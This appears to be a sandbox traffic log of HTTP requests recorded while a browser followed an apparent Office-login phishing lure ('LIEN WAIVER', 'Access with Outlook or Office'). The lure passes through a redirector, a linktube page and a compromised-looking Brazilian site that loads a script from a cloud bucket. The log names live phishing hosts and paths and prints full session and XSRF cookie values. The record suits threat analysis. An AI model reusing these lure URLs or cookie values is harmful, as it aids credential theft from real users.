Source: global trafficHTTP traffic detected: GET /tr/?id=432952554585575&ev=SubscribedButtonClick&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864714&cd[buttonFeatures]=%7B%22classList%22%3A%22page-link%20button%20custom-appearance-applied%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Access%20with%20Outlook%20or%20Office%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Access%20with%20Outlook%20or%20Office&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22LIEN%20WAIVER%22%7D&sw=1280&sh=1024&v=2.9.190&r=stable&ec=1&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&es=automatic&tm=3&exp=k2&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://apressa.com.brsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://apressa.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: hzofjndpntxsowciisqm.ecohmlsdeltiempo.it.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveOrigin: https://apressa.com.brsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://apressa.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://apressa.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveOrigin: https://apressa.com.brsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://apressa.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=432952554585575&ev=SubscribedButtonClick&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864714&cd[buttonFeatures]=%7B%22classList%22%3A%22page-link%20button%20custom-appearance-applied%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Access%20with%20Outlook%20or%20Office%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Access%20with%20Outlook%20or%20Office&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22LIEN%20WAIVER%22%7D&sw=1280&sh=1024&v=2.9.190&r=stable&ec=1&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&es=automatic&tm=3&exp=k2&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v3/m-outer-3437aaddcdf6922d623e172c2d6f9278.html HTTP/1.1Host: js.stripe.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sw.js HTTP/1.1Host: linktube.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://linktube.com/ssfuelsUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: auth.strategy=local; auth._token.local=false; auth._refresh_token.local=false; _fuid=MDBlMmI3NjAtNzMxMy00MmE5LWI2YTEtNmYxYzk5MTE2NDMw; _fbp=fb.1.1743018861934.367737420634560964; XSRF-TOKEN=eyJpdiI6InFJOGRSSVdYV0JQOEphUHBvUHJxSUE9PSIsInZhbHVlIjoiRHZwQUkrRW5qYkY1NWFCcXMwZC9BZ2dBakh0bTF0eEZGMTgwS3lOYW1GN1oyU0ZRS1hYMDNrTFU4akRxVTFoUyIsIm1hYyI6ImVkMzE3NDhkYTA2MjdjZGRjODAwMjdiMzllMzg4ZDhjYWYwY2Q3YzdmNjAyZDdlODhlYzhhMGU5NDJkNTExZmMifQ%3D%3D; linktube_session=eyJpdiI6InVjUUxra0FWakhsNlFGSmRydVQ0cnc9PSIsInZhbHVlIjoiTlR0NlNwVFowbFhFMUtOME5JNnhabVI2a1U1NE16RGZyUStSUlJtcjRNSWZHR3l5OXYrb3M5RTZqSC9vQXdwNyIsIm1hYyI6ImM3MzM2NTA5Y2YzNWFlZjdmNjQ5ZjA3YTlkMTgwZjRhMGE0NDVhN2RkOTdkNGU0MDM2ODNhNjIyM2U0ODU2YmIifQ%3D%3D
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/03/favicon-100x100.jpg HTTP/1.1Host: apressa.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v3/fingerprinted/js/m-outer-15a2b40a058ddff1cffdb63779fe3de1.js HTTP/1.1Host: js.stripe.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://js.stripe.com/v3/m-outer-3437aaddcdf6922d623e172c2d6f9278.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/workbox-cdn@4.3.1/workbox/workbox-sw.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /login HTTP/1.1Host: office.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/workbox-cdn@4.3.1/workbox/workbox-core.prod.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /inner.html HTTP/1.1Host: m.stripe.networkConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://js.stripe.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /login HTTP/1.1Host: www.office.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/workbox-cdn@4.3.1/workbox/workbox-precaching.prod.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /attach%2Fbootstrapp.min.js HTTP/1.1Host: 5382072737-1317754460.cos.ap-bangkok.myqcloud.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://apressa.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /out-4.5.44.js HTTP/1.1Host: m.stripe.networkConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://m.stripe.network/inner.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/workbox-cdn@4.3.1/workbox/workbox-routing.prod.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638786156691492130.MDNmNjcxNDItZDkxMy00YzIwLTkyMGYtM2ZmYWY5MGM0MzI1ZTU5M2IyZTMtZDVmOC00N2MwLTliZWItYjc4MDFhMjI5MDc1&ui_locales=en-US&mkt=en-US&client-request-id=9f85fc14-bc67-4c6a-b4d7-6f6ae37e0f7b&state=xcmXxtfbPduD7crhPV_ThOnlG7wD6YDGYrLGh6j3MNeuKWwBi0O5aWl6j_A-JTE2wEw9y_QFs-x_BAfJKkiVcSAULW2Tuf70IkBm0Y04sR6MB4ZcKizVNnrjf2aoLr_QK_B2vPkRjrXIN3RJ-IobP92ZDoHp3WRLjBQJ0XukOSPR-H91w_44dqqMKUjpup0yjziOr_CKm7F6M9XcIs1zraqkuCyp_hjByx-MWmyhf6kfS9we6P56Wi0Hqgq4BdHDTm-XHTrS-1I9M6wO22bazQ&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0 HTTP/1.1Host: login.microsoftonline.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/workbox-cdn@4.3.1/workbox/workbox-strategies.prod.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_nuxt/manifest.4ba95c29.json HTTP/1.1Host: linktube.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://linktube.com/ssfuelsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: linktube.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://linktube.com/ssfuelsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: auth.strategy=local; auth._token.local=false; auth._refresh_token.local=false; _fuid=MDBlMmI3NjAtNzMxMy00MmE5LWI2YTEtNmYxYzk5MTE2NDMw; _fbp=fb.1.1743018861934.367737420634560964; XSRF-TOKEN=eyJpdiI6InFJOGRSSVdYV0JQOEphUHBvUHJxSUE9PSIsInZhbHVlIjoiRHZwQUkrRW5qYkY1NWFCcXMwZC9BZ2dBakh0bTF0eEZGMTgwS3lOYW1GN1oyU0ZRS1hYMDNrTFU4akRxVTFoUyIsIm1hYyI6ImVkMzE3NDhkYTA2MjdjZGRjODAwMjdiMzllMzg4ZDhjYWYwY2Q3YzdmNjAyZDdlODhlYzhhMGU5NDJkNTExZmMifQ%3D%3D; linktube_session=eyJpdiI6InVjUUxra0FWakhsNlFGSmRydVQ0cnc9PSIsInZhbHVlIjoiTlR0NlNwVFowbFhFMUtOME5JNnhabVI2a1U1NE16RGZyUStSUlJtcjRNSWZHR3l5OXYrb3M5RTZqSC9vQXdwNyIsIm1hYyI6ImM3MzM2NTA5Y2YzNWFlZjdmNjQ5ZjA3YTlkMTgwZjRhMGE0NDVhN2RkOTdkNGU0MDM2ODNhNjIyM2U0ODU2YmIifQ%3D%3D
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: linktube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: auth.strategy=local; auth._token.local=false; auth._refresh_token.local=false; _fuid=MDBlMmI3NjAtNzMxMy00MmE5LWI2YTEtNmYxYzk5MTE2NDMw; _fbp=fb.1.1743018861934.367737420634560964; XSRF-TOKEN=eyJpdiI6InFJOGRSSVdYV0JQOEphUHBvUHJxSUE9PSIsInZhbHVlIjoiRHZwQUkrRW5qYkY1NWFCcXMwZC9BZ2dBakh0bTF0eEZGMTgwS3lOYW1GN1oyU0ZRS1hYMDNrTFU4akRxVTFoUyIsIm1hYyI6ImVkMzE3NDhkYTA2MjdjZGRjODAwMjdiMzllMzg4ZDhjYWYwY2Q3YzdmNjAyZDdlODhlYzhhMGU5NDJkNTExZmMifQ%3D%3D; linktube_session=eyJpdiI6InVjUUxra0FWakhsNlFGSmRydVQ0cnc9PSIsInZhbHVlIjoiTlR0NlNwVFowbFhFMUtOME5JNnhabVI2a1U1NE16RGZyUStSUlJtcjRNSWZHR3l5OXYrb3M5RTZqSC9vQXdwNyIsIm1hYyI6ImM3MzM2NTA5Y2YzNWFlZjdmNjQ5ZjA3YTlkMTgwZjRhMGE0NDVhN2RkOTdkNGU0MDM2ODNhNjIyM2U0ODU2YmIifQ%3D%3D
Source: global trafficHTTP traffic detected: GET /gh/pranaynamnaik/files@latest/micro-123787483.png HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://apressa.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1Host: m.stripe.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: m=c4bc4dd8-6df4-49be-9044-d89092d4a6e576af86
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: stripe.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1Host: m.stripe.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: m=c4bc4dd8-6df4-49be-9044-d89092d4a6e576af86
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: stripe.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: 404.ecohmlsdeltiempo.it.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveOrigin: https://apressa.com.brsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://apressa.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /offc/1.png HTTP/1.1Host: apressa.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://apressa.com.br/offc/scg.html?utm_medium=social&utm_source=&utm_campaign=Access+with+Outlook+or+OfficeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /exit.php?url=aHR0cHM6Ly9saW5rdHViZS5jb20vc3NmdWVscw==&entry_id=208 HTTP/1.1Host: blog.lenodal.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: s9y_259c82b39b11d8887a3daf44e97f5ea3=b8037381a063d018e5af5b2283a62140
Source: global trafficHTTP traffic detected: GET /ssfuels HTTP/1.1Host: linktube.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Upgrade-Insecure-Requests: 1sec-ch-ua-mobile: ?0Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: auth.strategy=local; auth._token.local=false; auth._refresh_token.local=false; _fuid=MDBlMmI3NjAtNzMxMy00MmE5LWI2YTEtNmYxYzk5MTE2NDMw; _fbp=fb.1.1743018861934.367737420634560964; XSRF-TOKEN=eyJpdiI6InFJOGRSSVdYV0JQOEphUHBvUHJxSUE9PSIsInZhbHVlIjoiRHZwQUkrRW5qYkY1NWFCcXMwZC9BZ2dBakh0bTF0eEZGMTgwS3lOYW1GN1oyU0ZRS1hYMDNrTFU4akRxVTFoUyIsIm1hYyI6ImVkMzE3NDhkYTA2MjdjZGRjODAwMjdiMzllMzg4ZDhjYWYwY2Q3YzdmNjAyZDdlODhlYzhhMGU5NDJkNTExZmMifQ%3D%3D; 